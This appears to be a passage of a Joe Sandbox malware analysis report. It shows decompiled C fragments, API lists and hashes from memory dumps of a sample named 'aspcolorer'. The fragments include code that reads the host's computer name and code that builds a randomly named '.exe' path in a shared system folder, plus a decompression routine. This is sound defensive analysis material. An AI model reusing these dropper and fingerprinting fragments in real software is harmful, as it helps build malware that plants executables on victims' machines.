Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: CountTick$ObjectSingleWait
String ID:
API String ID: 2051767920-0
Opcode ID: e7578cc9641c9160a323a31fdaf9367e9a00bc65e3fd72d5c8d2e8860974e343
Instruction ID: 5e117f779819b5b88c22e9c9b3341e69d279d4cc0acf9f3ce9604c9b30873f8d
Opcode Fuzzy Hash: e7578cc9641c9160a323a31fdaf9367e9a00bc65e3fd72d5c8d2e8860974e343
Instruction Fuzzy Hash: 9701F6B1E802059BE7116B61F84DBAD3B7AFB48705F844829F516E1390FBBC8C29CB45

Uniqueness

Uniqueness Score: -1.00%

Function 02D610B7, Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(?,00000001,?,?), ref: 02D610F1
SetEvent.KERNEL32(00000000,?,00000001,?,?), ref: 02D610FE
CloseHandle.KERNEL32(00000000,?,00000001,?,?), ref: 02D61105
CloseHandle.KERNEL32(00000000), ref: 02D61111

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$Create
String ID:
API String ID: 2420982144-0
Opcode ID: e124a8c2ec08618399343dbe84c2d2f1ad4d03743e29d3506aa7d33cc830ff59
Instruction ID: c28d4383cf8a721282eb778d0986b78c6a7189b7b075c40d9af9bd4e60f79342
Opcode Fuzzy Hash: e124a8c2ec08618399343dbe84c2d2f1ad4d03743e29d3506aa7d33cc830ff59
Instruction Fuzzy Hash: D8F09071D8011067C7226660990DBAE363AEB45751F040995F90E93341EB38CD248EA5

Uniqueness

Uniqueness Score: -1.00%

Function 02D6F5CA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E02D6F5CA(DWORD* __eax, void* __ebx, char* __esi) {
				void* _t15;
				intOrPtr _t19;
				char* _t20;
				int _t23;
				char _t25;
				void* _t32;
				void* _t38;
				void* _t40;

				_t35 = __esi;
				 *(_t38 - 4) = 0x10;
				if(GetComputerNameW(_t38 - 0x34, __eax) == 0) {
					L13:
					 *(_t38 - 0x14) = 0x58;
					L14:
					goto 0x2d81b78;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("invalid");
					_t15 = L02D61C80(_t30, 0x2c, _t35);
					 *0x2d74d6c(0x2d77438, 0x104, _t15, _t38 - 0x14,  *0x2d74aec);
					return L02D61DB0(_t15);
				}
				_t32 = _t38 - 0x34;
				_t19 = E02D613A0(_t32);
				_push(_t32);
				 *0x2d74ae4 = _t19;
				_t20 = L02D61C80(0x2d73760, 0x2c, __esi);
				_t40 = _t40 + 4;
				_t35 = _t20;
				_t23 = WideCharToMultiByte(0, 0x400, _t38 - 0x34, 0xffffffff, _t38 - 0x14, 0x10, _t35, 0);
				_t30 = _t35;
				L02D61DB0(_t35);
				if((0 | _t23 > 0x00000000) == 0) {
					goto L13;
				}
				_t30 = _t38 - 0x14;
				if( *(_t38 - 0x14) == 0) {
					goto L14;
				}
				do {
					_t25 =  *_t30;
					if(_t25 < 0x30 || _t25 > 0x39) {
						if(_t25 < 0x61 || _t25 > 0x7a) {
							if(_t25 < 0x41 || _t25 > 0x5a) {
								 *_t30 = 0x58;
							}
						}
					}
					_t30 =  &(_t30[1]);
				} while ( *_t30 != 0);
				goto L14;
			}

0x02d6f5ca
0x02d6f5ca
0x02d6f5de
0x02d6f665
0x02d6f665
0x02d6f66b
0x02d6f66b
0x02d6f670
0x02d6f671
0x02d6f672
0x02d6f673
0x02d6f674
0x02d6f676
0x02d6f692
0x02d6f6a6
0x02d6f6a6
0x02d6f5e5
0x02d6f5e8
0x02d6f5ed
0x02d6f5f3
0x02d6f5fd
0x02d6f602
0x02d6f605
0x02d6f61d
0x02d6f625
0x02d6f62c
0x02d6f634
0x00000000
0x00000000
0x02d6f63a
0x02d6f63d
0x00000000
0x00000000
0x02d6f640
0x02d6f640
0x02d6f644
0x02d6f64c
0x02d6f654
0x02d6f65a
0x02d6f65a
0x02d6f654
0x02d6f64c
0x02d6f65d
0x02d6f65e
0x00000000

APIs

GetComputerNameW.KERNEL32(?), ref: 02D6F5D6
WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 02D6F61D

Strings

X, xrefs: 02D6F665

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: ByteCharComputerMultiNameWide
String ID: X
API String ID: 4013585866-3081909835
Opcode ID: e28401cebf1813d08f77d22d703a2612ea78684e28b4aa9d0dcc914c01d8b131
Instruction ID: 58ccd305478f5e80438b9b696efa21b305f44f052b1a7420578a8a559661b2c6
Opcode Fuzzy Hash: e28401cebf1813d08f77d22d703a2612ea78684e28b4aa9d0dcc914c01d8b131
Instruction Fuzzy Hash: 52110A70986589AFDB1097E4A94CBFA37AADB02308F101115E142F17E0E7648D0ACA26

Uniqueness

Uniqueness Score: -1.00%

Function 02D6D057, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02D6D0B0
GetModuleHandleW.KERNEL32(00000000,00000000), ref: 02D6D0D0

Strings

0, xrefs: 02D6D096

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: HandleModule
String ID: 0
API String ID: 4139908857-4108050209
Opcode ID: 8e288731a27333f64d4c6be88294ff4422c1bd091789edb8e9b191ababc6a771
Instruction ID: 94ca6973d38bde7875ad354d47f80946be4b2ccf618f119a9a4971b750710c7e
Opcode Fuzzy Hash: 8e288731a27333f64d4c6be88294ff4422c1bd091789edb8e9b191ababc6a771
Instruction Fuzzy Hash: 7F118271A40208ABEB11AB90EC09FAD7779FB04744F200419EA09B6380EB789A19CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02D6FCA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02D6FCA0(WCHAR* __ecx) {
				WCHAR* _t19;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t28;

				_t19 = __ecx;
				 *0x2d75284(0, 0x23, 0, 0, __ecx);
				_t23 = lstrlenW(__ecx);
				 *((short*)(_t19 + _t23 * 2)) = 0x5c;
				_t24 = _t23 + 1;
				_t28 = (GetTickCount() & 0x0000000f) + 4;
				L02D621E0(_t19 + _t24 * 2, _t28);
				_t25 = _t24 + _t28;
				 *((intOrPtr*)(_t19 + _t25 * 2)) = 0x65002e;
				 *((intOrPtr*)(_t19 + 4 + _t25 * 2)) = 0x650078;
				 *((short*)(_t19 + 8 + _t25 * 2)) = 0;
				return 0;
			}

0x02d6fca3
0x02d6fcae
0x02d6fcbb
0x02d6fcc2
0x02d6fcc6
0x02d6fcd5
0x02d6fcda
0x02d6fcdf
0x02d6fce3
0x02d6fcea
0x02d6fcf2
0x02d6fcfa

APIs

lstrlenW.KERNEL32 ref: 02D6FCB5
GetTickCount.KERNEL32 ref: 02D6FCC7

Strings

x, xrefs: 02D6FCEA

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: CountTicklstrlen
String ID: x
API String ID: 2992449761-2363233923
Opcode ID: 9dfe6228b468b52e23855873d01bfe2d59ea77282e351a01a3bfc880dab901a3
Instruction ID: 77ba9b90e18633324536438f9deaac5071057d9dc5cf72e2d6c0c5631289ef69
Opcode Fuzzy Hash: 9dfe6228b468b52e23855873d01bfe2d59ea77282e351a01a3bfc880dab901a3
Instruction Fuzzy Hash: 12F0E2B2A443556BE7201FA0EC88B053765EF44352F044074ED05DF381EB78CC0487E0

Uniqueness

Uniqueness Score: -1.00%

Function 02D65EE5, Relevance: 5.1, APIs: 4, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E02D65EE5(void* __ebx, void __edi, signed int __esi) {
				signed int _t597;
				signed int _t599;
				void* _t600;
				signed int _t610;
				signed int* _t620;
				signed int _t623;
				signed int _t640;
				signed int _t642;
				signed int _t644;
				signed int _t652;
				signed int _t655;
				signed int _t657;
				signed int _t660;
				signed int _t666;
				signed int _t669;
				signed int _t671;
				void* _t673;
				signed int _t676;
				signed int _t680;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t690;
				unsigned int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t699;
				signed int _t709;
				signed int _t714;
				signed int _t716;
				signed int _t719;
				signed int _t721;
				signed int _t722;
				intOrPtr _t734;
				intOrPtr _t735;
				intOrPtr _t736;
				signed int _t739;
				signed int _t743;
				void* _t749;
				signed int _t754;
				signed int _t756;
				signed int _t760;
				signed int _t764;
				signed int _t767;
				signed int _t771;
				void* _t776;
				signed int _t780;
				void* _t781;
				signed int _t786;
				void* _t787;
				void* _t788;
				signed int _t793;
				signed int _t794;
				void* _t796;
				signed int _t797;
				signed int _t804;
				signed int _t806;
				intOrPtr* _t808;
				void* _t809;
				signed int _t820;
				signed int _t822;
				intOrPtr _t824;
				signed char _t828;
				intOrPtr* _t830;
				void* _t831;
				signed int _t839;
				void* _t841;
				void* _t843;
				signed int _t845;
				intOrPtr _t846;
				signed int _t856;
				signed int _t859;
				void* _t860;
				void* _t861;
				void* _t862;
				void* _t863;
				void* _t864;
				void* _t865;
				void* _t866;
				void* _t867;
				signed char _t868;
				signed char _t871;
				intOrPtr _t873;
				signed int _t876;
				void* _t877;
				signed char _t879;
				signed int _t880;
				signed int _t881;
				signed char _t886;
				signed int _t888;
				void* _t889;
				void* _t890;
				signed int _t893;
				signed char _t894;
				intOrPtr _t896;
				intOrPtr _t898;
				void* _t901;
				signed char _t902;
				signed char _t903;
				void _t904;
				signed int _t908;
				signed char _t913;
				void* _t914;
				void* _t915;
				signed int _t918;
				void* _t923;
				signed int _t927;
				signed char _t931;
				signed int _t932;
				signed char _t935;
				signed int _t936;
				void* _t944;
				signed int _t959;
				unsigned int _t962;
				signed int _t963;
				signed int _t965;
				signed int _t969;
				signed int* _t970;
				signed char* _t975;
				void* _t976;
				void* _t981;
				signed int _t982;
				signed int _t983;
				signed int _t986;
				signed int _t987;
				signed int _t989;
				signed int _t991;
				signed int _t992;
				signed int _t995;
				signed int _t999;
				signed int _t1005;
				signed int _t1006;
				int _t1007;
				int _t1009;
				signed int _t1010;
				unsigned int _t1013;
				void* _t1017;
				intOrPtr _t1018;
				signed char _t1019;
				void _t1022;
				void* _t1024;
				signed int _t1025;
				void* _t1027;
				int _t1032;
				signed int _t1033;
				void* _t1035;
				unsigned int _t1036;
				signed int _t1037;
				void* _t1038;
				void* _t1040;
				signed int _t1042;
				signed int _t1043;
				unsigned int _t1045;
				signed int _t1046;
				unsigned int _t1048;
				signed int _t1049;
				signed char _t1057;
				void* _t1058;
				void* _t1060;
				void* _t1061;

				L0:
				while(1) {
					L0:
					_t1043 = __esi;
					_t1022 = __edi;
					_t841 = __ebx;
					_t596 = memset(__edi + 0x1b80, 0, ??);
					_t962 =  *(_t1058 - 4);
					_t1061 = _t1060 + 0xc;
					while(1) {
						L135:
						 *(_t1058 - 8) = _t893;
						__eflags = _t893 -  *((intOrPtr*)(_t1022 + 0x34));
						if(_t893 >=  *((intOrPtr*)(_t1022 + 0x34))) {
							break;
						}
						L136:
						__eflags = _t1043 - 3;
						if(_t1043 >= 3) {
							L139:
							_t927 = _t991 & 0x00000007;
							_t991 = _t991 >> 3;
							_t1043 = _t1043 - 3;
							 *(_t1058 - 4) = _t991;
							 *(_t1058 - 0x1c) = _t1043;
							_t596 =  *( *(_t1058 - 8) + 0x2d71a24) & 0x000000ff;
							 *(_t596 + _t1022 + 0x1b80) = _t927;
							_t893 =  *(_t1058 - 8) + 1;
							continue;
						} else {
							while(1) {
								L137:
								__eflags = _t841 -  *(_t1058 - 0x20);
								if(_t841 >=  *(_t1058 - 0x20)) {
									break;
								}
								L138:
								_t596 = ( *_t841 & 0x000000ff) << _t1043;
								_t841 = _t841 + 1;
								_t991 = _t991 | _t596;
								 *(_t1058 - 0x18) = _t841;
								_t1043 = _t1043 + 8;
								 *(_t1058 - 4) = _t991;
								__eflags = _t1043 - 3;
								if(_t1043 < 3) {
									continue;
								} else {
									goto L139;
								}
								goto L295;
							}
							L249:
							 *_t1022 = 0xe;
							L285:
							__eflags =  *(_t1058 + 0x18) & 0x00000002;
							L286:
							L287:
							_t597 =  !=  ? 1 : _t596;
							 *(_t1058 - 0xc) = _t597;
							__eflags = _t597 - 1;
							if(_t597 != 1) {
								L288:
								__eflags = _t597 - 0xfffffffc;
								if(_t597 != 0xfffffffc) {
									L289:
									L292:
									_t642 =  *(_t1058 - 0x3c);
									__eflags = _t841 - _t642;
									if(_t841 > _t642) {
										while(1) {
											L293:
											__eflags = _t1043 - 8;
											if(_t1043 < 8) {
												goto L295;
											}
											L294:
											_t841 = _t841 - 1;
											_t1043 = _t1043 - 8;
											__eflags = _t841 - _t642;
											if(_t841 > _t642) {
												continue;
											}
											goto L295;
										}
									}
								}
							}
						}
						L295:
						_t963 =  *(_t1058 - 4);
						L296:
						 *(_t1022 + 4) = _t1043;
						asm("bts ecx, esi");
						__eflags = _t1043 - 0x20;
						_t599 =  >=  ? 0 : 0;
						_t856 = 0 ^ _t599;
						__eflags = _t1043 - 0x40;
						_t600 =  >=  ? _t856 : _t599;
						 *(_t1022 + 0x20) =  *(_t1058 - 0x28);
						_t965 =  *(_t1058 - 0x10) -  *(_t1058 + 0x10);
						__eflags =  *(_t1058 + 0x18) & 0x00000009;
						 *(_t1022 + 0x24) =  *(_t1058 - 8);
						 *(_t1022 + 0x28) =  *(_t1058 - 0x38);
						 *((intOrPtr*)(_t1022 + 0x3c)) =  *((intOrPtr*)(_t1058 - 0x48));
						 *(_t1022 + 0x38) = _t856 - 0x00000001 & _t963;
						 *(_t1058 - 0x10) = _t965;
						 *((intOrPtr*)( *((intOrPtr*)(_t1058 + 8)))) = _t841 -  *(_t1058 - 0x3c);
						_t843 =  *(_t1058 - 0xc);
						 *( *(_t1058 + 0x14)) = _t965;
						if(( *(_t1058 + 0x18) & 0x00000009) != 0) {
							L297:
							__eflags = _t843;
							if(_t843 >= 0) {
								L298:
								_t1045 =  *(_t1022 + 0x1c);
								_t859 = _t1045 & 0x0000ffff;
								_t610 = (0x5e6ea9af * _t965 >> 0x20 >> 0xb) * 0x15b0;
								_t1046 = _t1045 >> 0x10;
								 *(_t1058 - 0x3c) = _t1046;
								_t969 =  *(_t1058 - 0x10) - _t610;
								__eflags =  *(_t1058 - 0x10);
								 *(_t1058 - 0x34) = _t969;
								if( *(_t1058 - 0x10) != 0) {
									L299:
									_t845 = _t969;
									do {
										L300:
										_t970 = 0;
										 *(_t1058 + 0x14) = 0;
										__eflags = _t845 - 7;
										if(_t845 > 7) {
											L301:
											goto 0x2d815c6;
											asm("int3");
											asm("int3");
											asm("int3");
											L302:
											_t1024 = _t1022 - _t610;
											__eflags = _t1024;
											do {
												L303:
												_t970 =  &(_t970[2]);
												_t861 = _t859 + ( *_t610 & 0x000000ff);
												_t862 = _t861 + ( *( *(_t1058 + 0x10) + 1) & 0x000000ff);
												_t863 = _t862 + ( *( *(_t1058 + 0x10) + 2) & 0x000000ff);
												_t864 = _t863 + ( *( *(_t1058 + 0x10) + 3) & 0x000000ff);
												_t865 = _t864 + ( *( *(_t1058 + 0x10) + 4) & 0x000000ff);
												_t866 = _t865 + ( *( *(_t1058 + 0x10) + 5) & 0x000000ff);
												_t867 = _t866 + ( *( *(_t1058 + 0x10) + 6) & 0x000000ff);
												_t859 = _t867 + ( *( *(_t1058 + 0x10) + 7) & 0x000000ff);
												_t640 =  *(_t1058 + 0x10) + 8;
												_t1046 = _t1046 + _t861 + _t862 + _t863 + _t864 + _t865 + _t866 + _t867 + _t859;
												 *(_t1058 + 0x10) = _t640;
												__eflags = _t1024 + _t640 - _t845;
												_t610 =  *(_t1058 + 0x10);
											} while (_t1024 + _t640 < _t845);
											 *(_t1058 + 0x14) = _t970;
											 *(_t1058 - 0x3c) = _t1046;
										}
										L305:
										_t1022 = 0;
										 *((intOrPtr*)(_t1058 + 8)) = 0;
										__eflags = _t970 - _t845;
										if(_t970 < _t845) {
											L306:
											__eflags = _t845 - _t970 - 2;
											if(_t845 - _t970 >= 2) {
												L307:
												_t620 =  *(_t1058 + 0x14);
												_t1049 =  *(_t1058 + 0x10);
												_t846 = 0;
												_t981 = (_t845 - _t620 - 2 >> 1) + 1;
												__eflags = _t981;
												 *(_t1058 + 0x14) = _t620 + _t981 * 2;
												do {
													L308:
													_t860 = _t859 + ( *_t1049 & 0x000000ff);
													_t623 =  *(_t1049 + 1) & 0x000000ff;
													_t1022 = _t1022 + _t860;
													_t1049 = _t1049 + 2;
													_t859 = _t860 + _t623;
													_t846 = _t846 + _t859;
													_t981 = _t981 - 1;
													__eflags = _t981;
												} while (_t981 != 0);
												_t970 =  *(_t1058 + 0x14);
												 *(_t1058 + 0x10) = _t1049;
												_t1046 =  *(_t1058 - 0x3c);
												 *((intOrPtr*)(_t1058 + 8)) = _t846;
												_t845 =  *(_t1058 - 0x34);
											}
											L310:
											__eflags = _t970 - _t845;
											if(_t970 < _t845) {
												_t975 =  *(_t1058 + 0x10);
												_t859 = _t859 + ( *_t975 & 0x000000ff);
												_t1046 = _t1046 + _t859;
												_t976 =  &(_t975[1]);
												__eflags = _t976;
												 *(_t1058 + 0x10) = _t976;
											}
											L312:
											_t610 =  *((intOrPtr*)(_t1058 + 8)) + _t1022;
											_t1046 = _t1046 + _t610;
											__eflags = _t1046;
										}
										L313:
										L314:
										_t859 = _t859 + (_t610 * _t859 >> 0x20 >> 0xf) * 0xffff000f;
										_t610 = (0x80078071 * _t1046 >> 0x20 >> 0xf) * 0xffff000f;
										_t1046 = _t1046 + _t610;
										_t586 = _t1058 - 0x10;
										 *_t586 =  *(_t1058 - 0x10) - _t845;
										__eflags =  *_t586;
										_t845 = 0x15b0;
										 *(_t1058 - 0x3c) = _t1046;
										 *(_t1058 - 0x34) = 0x15b0;
									} while ( *_t586 != 0);
									goto 0x2d815ef;
									asm("int3");
								}
								L316:
								_t1048 = (_t1046 << 0x10) + _t859;
								 *(_t1022 + 0x1c) = _t1048;
								__eflags = _t843;
								if(_t843 == 0) {
									__eflags =  *(_t1058 + 0x18) & 0x00000001;
									if(( *(_t1058 + 0x18) & 0x00000001) != 0) {
										__eflags = _t1048 -  *(_t1022 + 0x10);
										_t843 =  !=  ? 0xfffffffe : _t843;
									}
								}
							}
						}
						L319:
						return _t843;
						L320:
					}
					L140:
					 *((intOrPtr*)(_t1022 + 0x34)) = 0x13;
					while(1) {
						L141:
						_t694 =  *(_t1022 + 0x18);
						__eflags = _t694;
						if(_t694 >= 0) {
							break;
						}
						L218:
						_t982 =  *(_t1058 - 4);
						while(1) {
							L39:
							_t879 =  *(_t1058 - 0x20) - _t841;
							__eflags = _t879 - 4;
							if(_t879 < 4) {
								goto L58;
							}
							L40:
							_t1022 =  *(_t1058 - 0x14);
							__eflags =  *((intOrPtr*)(_t1058 - 0x40)) -  *(_t1058 - 0x10) - 2;
							if( *((intOrPtr*)(_t1058 - 0x40)) -  *(_t1058 - 0x10) < 2) {
								goto L58;
							} else {
								L41:
								__eflags = _t1043 - 0xf;
								if(_t1043 < 0xf) {
									_t995 =  *(_t841 + 1) & 0x000000ff;
									_t879 = _t1043;
									_t722 =  *_t841 & 0x000000ff;
									_t841 = _t841 + 2;
									 *(_t1058 - 0x18) = _t841;
									 *(_t1058 - 4) =  *(_t1058 - 4) | (_t995 << 0x00000008 | _t722) << _t879;
									_t1043 = _t1043 + 0x10;
									__eflags = _t1043;
									_t982 =  *(_t1058 - 4);
								}
								_t596 =  *((short*)(_t1022 + 0x160 + (_t982 & 0x000003ff) * 2));
								 *(_t1058 - 8) = _t596;
								__eflags = _t596;
								if(_t596 < 0) {
									L45:
									goto 0x2d8145c;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L46:
										_t709 = _t982 >> _t879;
										_t879 = _t879 + 1;
										_t596 = (_t709 & 0x00000001) +  !_t841;
										_t841 =  *((short*)(_t1022 + 0x960 + _t596 * 2));
										__eflags = _t841;
									} while (_t841 < 0);
									 *(_t1058 - 8) = _t841;
									_t841 =  *(_t1058 - 0x18);
								} else {
									L44:
									_t879 = _t596 >> 9;
								}
								L48:
								_t962 = _t982 >> _t879;
								_t1043 = _t1043 - _t879;
								_t880 =  *(_t1058 - 8);
								 *(_t1058 - 4) = _t962;
								__eflags = _t880 & 0x00000100;
								if((_t880 & 0x00000100) != 0) {
									L84:
									_t881 = _t880 & 0x000001ff;
									 *(_t1058 - 8) = _t881;
									__eflags = _t881 - 0x100;
									if(_t881 != 0x100) {
										L219:
										_t673 = _t881 * 4 - 0x404;
										_t868 =  *(_t673 + 0x2d71010);
										_t596 =  *(_t673 + 0x2d71a48);
										 *(_t1058 - 0x38) = _t868;
										 *(_t1058 - 8) = _t596;
										__eflags = _t868;
										if(_t868 == 0) {
											L225:
											__eflags = _t1043 - 0xf;
											if(_t1043 >= 0xf) {
												L3:
												_t655 =  *((short*)(_t1022 + 0xf00 + (_t962 & 0x000003ff) * 2));
												 *(_t1058 - 0x1c) = _t655;
												if(_t655 < 0) {
													L5:
													goto 0x2d813e3;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L7:
														_t657 = _t962 >> _t868;
														_t868 = _t868 + 1;
														_t841 =  *((short*)(_t1022 + 0x1700 + ((_t657 & 0x00000001) +  !_t841) * 2));
														__eflags = _t841;
													} while (_t841 < 0);
													 *(_t1058 - 0x1c) = _t841;
													_t841 =  *(_t1058 - 0x18);
													_t660 =  *(_t1058 - 0x1c);
												} else {
													L4:
													_t868 = _t655 >> 9;
													_t660 = _t655 & 0x000001ff;
												}
												L9:
												_t982 = _t962 >> _t868;
												_t1043 = _t1043 - _t868;
												_t871 =  *(0x2d71090 + _t660 * 4);
												_t596 =  *(0x2d71110 + _t660 * 4);
												 *(_t1058 - 4) = _t982;
												 *(_t1058 - 0x38) = _t871;
												 *(_t1058 - 0x28) = _t596;
												if(_t871 == 0) {
													L15:
													_t873 =  *(_t1058 - 0x10) -  *((intOrPtr*)(_t1058 + 0xc));
													 *((intOrPtr*)(_t1058 - 0x48)) = _t873;
													if(_t596 <= _t873 || ( *(_t1058 + 0x18) & 0x00000004) == 0) {
														L17:
														_t1022 =  *(_t1058 - 0x14);
														_t876 = (_t873 - _t596 &  *(_t1058 - 0x34)) +  *((intOrPtr*)(_t1058 + 0xc));
														 *(_t1058 - 0xc) = _t876;
														_t662 =  >  ?  *(_t1058 - 0x10) : _t876;
														_t877 =  *(_t1058 - 8);
														_t663 = ( >  ?  *(_t1058 - 0x10) : _t876) + _t877;
														_t1075 = ( >  ?  *(_t1058 - 0x10) : _t876) + _t877 -  *((intOrPtr*)(_t1058 - 0x40));
														if(( >  ?  *(_t1058 - 0x10) : _t876) + _t877 <=  *((intOrPtr*)(_t1058 - 0x40))) {
															L21:
															__eflags = _t877 - 9;
															if(_t877 < 9) {
																L30:
																goto 0x2d81420;
																asm("int3");
																do {
																	L32:
																	_t877 = _t877 - 3;
																	 *_t1022 =  *_t982 & 0x000000ff;
																	 *((char*)(_t1022 + 1)) =  *(_t982 + 1) & 0x000000ff;
																	_t666 =  *(_t982 + 2) & 0x000000ff;
																	_t982 = _t982 + 3;
																	 *(_t1022 + 2) = _t666;
																	_t1022 = _t1022 + 3;
																	__eflags = _t877 - 2;
																} while (_t877 > 2);
																goto L33;
															} else {
																L22:
																__eflags = _t877 -  *(_t1058 - 0x28);
																if(_t877 >  *(_t1058 - 0x28)) {
																	goto L30;
																} else {
																	L23:
																	_t1042 =  *(_t1058 - 0xc);
																	_t959 =  *(_t1058 - 0x10);
																	_t828 = (_t877 & 0xfffffff8) + _t1042;
																	 *(_t1058 - 0x24) = _t828;
																	_t1019 = _t828;
																	do {
																		L24:
																		 *_t959 =  *_t1042;
																		_t830 =  *((intOrPtr*)(_t1042 + 4));
																		_t1042 = _t1042 + 8;
																		 *((intOrPtr*)(_t959 + 4)) = _t830;
																		_t959 = _t959 + 8;
																		__eflags = _t1042 - _t1019;
																	} while (_t1042 < _t1019);
																	_t982 =  *(_t1058 - 4);
																	 *(_t1058 - 0x10) = _t959;
																	_t877 =  *(_t1058 - 8) & 0x00000007;
																	 *(_t1058 - 0xc) = _t1042;
																	_t1022 =  *(_t1058 - 0x14);
																	 *(_t1058 - 8) = _t877;
																	__eflags = _t877 - 3;
																	if(_t877 >= 3) {
																		goto L30;
																	} else {
																		goto L26;
																	}
																}
															}
															continue;
														} else {
															while(1) {
																L18:
																_t831 = _t877;
																_t877 = _t877 - 1;
																 *(_t1058 - 8) = _t877;
																if(_t831 == 0) {
																	goto L39;
																}
																L19:
																if( *(_t1058 - 0x10) >=  *((intOrPtr*)(_t1058 - 0x40))) {
																	L238:
																	 *(_t1058 - 0xc) = 2;
																	 *_t1022 = 0x35;
																	goto L292;
																} else {
																	L20:
																	 *(_t1058 - 0x10) =  *(_t1058 - 0x10) + 1;
																	 *((intOrPtr*)(_t1058 - 0x48)) =  *((intOrPtr*)(_t1058 - 0x48)) + 1;
																	 *( *(_t1058 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1058 - 0x48)) -  *(_t1058 - 0x28) &  *(_t1058 - 0x34)) +  *((intOrPtr*)(_t1058 + 0xc))));
																	_t982 =  *(_t1058 - 4);
																	continue;
																}
																goto L295;
															}
															while(1) {
																L39:
																_t879 =  *(_t1058 - 0x20) - _t841;
																__eflags = _t879 - 4;
																if(_t879 < 4) {
																	goto L58;
																}
																goto L40;
															}
															goto L58;
														}
													} else {
														L270:
														_t684 = _t596 | 0xffffffff;
														 *_t1022 = 0x25;
														goto L291;
													}
												} else {
													L10:
													if(_t1043 >= _t871) {
														L13:
														_t1043 = _t1043 - _t871;
														_t839 = (_t596 << _t871) - 0x00000001 & _t982;
														_t982 = _t982 >> _t871;
														 *(_t1058 - 0x28) =  *(_t1058 - 0x28) + _t839;
														_t596 =  *(_t1058 - 0x28);
														 *(_t1058 - 4) = _t982;
														goto L15;
													} else {
														L11:
														while(_t841 <  *(_t1058 - 0x20)) {
															_t596 = ( *_t841 & 0x000000ff) << _t1043;
															_t841 = _t841 + 1;
															_t871 =  *(_t1058 - 0x38);
															_t982 = _t982 | _t596;
															_t1043 = _t1043 + 8;
															 *(_t1058 - 0x18) = _t841;
															 *(_t1058 - 4) = _t982;
															if(_t1043 < _t871) {
																continue;
															} else {
																goto L13;
															}
															goto L295;
														}
														 *_t1022 = 0x1b;
														goto L285;
													}
												}
											} else {
												L226:
												__eflags =  *(_t1058 - 0x20) - _t841 - 2;
												if( *(_t1058 - 0x20) - _t841 >= 2) {
													L237:
													_t983 =  *(_t841 + 1) & 0x000000ff;
													_t676 =  *_t841 & 0x000000ff;
													_t841 = _t841 + 2;
													_t1022 =  *(_t1058 - 0x14);
													_t868 = _t1043;
													 *(_t1058 - 0x18) = _t841;
													 *(_t1058 - 4) =  *(_t1058 - 4) | _t983 << _t1043 + 0x00000008 | _t676 << _t868;
													_t1043 = _t1043 + 0x10;
													_t962 =  *(_t1058 - 4);
												} else {
													do {
														L227:
														_t596 =  *((short*)(_t1022 + 0xf00 + (_t962 & 0x000003ff) * 2));
														 *(_t1058 - 0x24) = _t596;
														__eflags = _t596;
														if(_t596 < 0) {
															L231:
															__eflags = _t1043 - 0xa;
															if(_t1043 <= 0xa) {
																goto L1;
															} else {
																L232:
																L233:
																 *(_t1058 - 0x1c) = _t868;
																while(1) {
																	L234:
																	_t868 =  *((short*)(_t1022 + 0x1700 + ((_t962 >> _t868 & 0x00000001) +  !( *(_t1058 - 0x24))) * 2));
																	_t652 =  *(_t1058 - 0x1c) + 1;
